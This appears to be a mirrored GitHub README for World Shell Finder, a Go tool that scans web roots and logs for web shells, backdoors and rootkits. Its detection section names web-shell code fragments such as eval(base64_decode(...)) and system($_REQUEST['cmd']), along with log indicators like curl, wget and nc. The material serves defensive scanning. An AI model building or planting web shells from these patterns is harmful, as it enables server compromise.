https://github.com/aryma-f4/worldshellfinder

Web Shell finder using grep, where it has wordlist around the world to grep inside using regex and wordlist. So Lightweight and fast!
https://github.com/aryma-f4/worldshellfinder

backdoor backdoor-defense backdoor-finder cyber-security cybersecurity finder finder-shell security security-scanner shell shell-detection shell-detector shell-finder shell-script web-shell webshell worldfind worldshellfinder

Last synced: 11 days ago
JSON representation

Web Shell finder using grep, where it has wordlist around the world to grep inside using regex and wordlist. So Lightweight and fast!

• Host: GitHub
• URL: https://github.com/aryma-f4/worldshellfinder
• Owner: Aryma-f4
• License: mit
• Created: 2024-09-24T07:52:26.000Z (over 1 year ago)
• Default Branch: master
• Last Pushed: 2025-02-06T01:53:20.000Z (about 1 year ago)
• Last Synced: 2025-12-02T17:58:32.188Z (5 months ago)
• Topics: backdoor, backdoor-defense, backdoor-finder, cyber-security, cybersecurity, finder, finder-shell, security, security-scanner, shell, shell-detection, shell-detector, shell-finder, shell-script, web-shell, webshell, worldfind, worldshellfinder
• Language: Go
• Homepage:
• Size: 9.35 MB
• Stars: 31
• Watchers: 2
• Forks: 5
• Open Issues: 0
• Metadata Files:
  • Readme: readme.md
  • Contributing: CONTRIBUTING.md
  • License: LICENSE

Awesome Lists containing this project

README

          


# World Shell Finder

World Shell Finder is a Go command-line tool for detecting suspicious web shells and backdoors inside web roots or other source directories. It combines keyword matching, regex rules, and heuristic scoring to improve detection quality while reducing noisy single-hit matches.

![shellfind](https://github.com/user-attachments/assets/3fa2513f-5eef-433c-ac7f-92d3e5789397)



  

  

  

  

  



![Worldshellfinder flow](https://github.com/user-attachments/assets/430df5ec-d1b3-46f8-9fdd-27be51c30d88)

## Disclaimer

This project is intended for educational, incident response, and defensive security use. It does not replace a full malware analysis process. False positives and false negatives are still possible.

## Highlights

- Refactored into a **Clean Architecture** to ensure modularity, maintainability, and scalability.

- Beautiful, intuitive **Interactive UI** powered by `pterm`.

- Integrates **VirusTotal API** as a malware reference database to improve detection rules and confirm suspicious files.

- Detects suspicious files using a scoring-based engine.

- Combines keyword matches, regex signatures, and heuristic indicators.

- Supports custom wordlists on top of the embedded default wordlist.

- Produces clearer output with suspicion score and evidence summary.

- Includes a string-removal mode for cleanup workflows.

- Ships with GitHub Actions CI/CD and automatic prereleases on each push to the main branch.

- Includes deep scan mode for suspicious traffic and broader rootkit checks.

## Detection Approach

The scanner evaluates files using multiple signals:

- Strong signatures such as obfuscated `eval(base64_decode(...))` patterns.

- Dangerous runtime execution flows like `system($_REQUEST['cmd'])`.

- Upload and dropper behavior such as `move_uploaded_file(... .php)`.

- Heuristic combinations like user input plus command execution.

- Known shell markers from the bundled wordlist.

Files are reported when their suspicion score reaches the configured threshold.

## Installation

### Build from source

```bash

git clone https://github.com/Aryma-f4/worldshellfinder.git

cd worldshellfinder

go build -o worldshellfinder .

```

### Install with Go

```bash

go install github.com/Aryma-f4/worldshellfinder@latest

```

If your Go binary path is not available in `PATH`, add it first:

```bash

export PATH="$PATH:$HOME/go/bin"

```

## Usage

### Interactive mode

Run the program without flags to use the menu-based interactive mode:

```bash

./worldshellfinder

```

### Detection mode

Basic detection:

```bash

./worldshellfinder -mode detect -dir /var/www/html

```

Verbose detection:

```bash

./worldshellfinder -mode detect -dir /var/www/html -v

```

Detection with a custom wordlist:

```bash

./worldshellfinder -mode detect -dir /var/www/html -wordlist ./wordlists/zeus.txt

```

Detection with a stricter threshold:

```bash

./worldshellfinder -mode detect -dir /var/www/html -min-score 6 -max-evidence 8

```

Save results to a file:

```bash

./worldshellfinder -mode detect -dir /var/www/html -out result.txt

```

### Deep scan mode

Deep scan combines:

- file-based shell detection,

- suspicious traffic inspection,

- threat hunting on common auth, nginx, and apache logs,

- rootkit checks using `rkhunter`, `chkrootkit`, `unhide`, and built-in heuristics.

Example:

```bash

./worldshellfinder -mode deep -dir /var/www/html -out deep-report.txt -v

```

### Remove-string mode

```bash

./worldshellfinder -mode remove -dir /var/www/html -remove-string "malicious_snippet"

```

### Help

```bash

./worldshellfinder -h

```

## CLI Options

```text

-h, --help              Show help information

-v                      Enable verbose output

-mode string            Operation mode: detect, deep, or remove

-dir string             Directory to scan

-out string             Output file path

-wordlist string        Additional custom wordlist file

-min-score int          Minimum score before a file is reported

-max-evidence int       Maximum evidence entries shown per file

-remove-string string   String to remove when mode=remove

-vt-api-key string      VirusTotal API key for checking suspicious files against the malware database

--update                Update to the latest release

```

## Wordlists

The wordlist format is simple:

- One keyword or signature per line.

- Empty lines are ignored.

- Custom entries are merged with the embedded default wordlist.

See:

- [`wordlists/default.txt`](wordlists/default.txt)

- [`wordlists/zeus.txt`](wordlists/zeus.txt)

## Known Coverage

The repository also documents many shell families and samples already covered by the project:

- [Known shell list](list_find_already_shell.md)

## CI/CD

GitHub Actions now provides:

- Test execution on pull requests and pushes.

- Multi-platform build artifacts for Linux, Windows, and macOS.

- Automatic prerelease creation for every push to `main` or `master`.

- Attached archives and checksum file in each generated release.

## Rootkit Detection

Deep scan does not rely on a single tool. It can use:

- `rkhunter`

- `chkrootkit`

- `unhide`

- built-in heuristic checks for preload abuse, suspicious modules, hidden executables, temporary privilege-escalation binaries, and persistence points

## Log Threat Hunting

Deep scan also inspects common log locations such as:

- `/var/log/auth.log`

- `/var/log/secure`

- `/var/log/nginx/access.log`

- `/var/log/apache2/access.log`

It looks for signs such as:

- `cmd=`, `exec=`, `shell=`, or encoded payload probes

- suspicious upload and dropper patterns

- repeated authentication failures and invalid users

- `sudo`, `curl`, `wget`, `nc`, or privilege escalation activity in auth logs

If the process lacks permission to inspect protected paths, the tool prints:

```text

not enough permission to do this, gotta root

```

## Compatibility

- Linux

- Windows

- macOS

[![Go Workflow](https://github.com/Aryma-f4/worldshellfinder/actions/workflows/go.yml/badge.svg)](https://github.com/Aryma-f4/worldshellfinder/actions/workflows/go.yml)

## Contributing

Contributions are welcome. Feel free to open an issue or submit a pull request for:

- new shell signatures,

- detection improvements,

- performance fixes,

- documentation updates.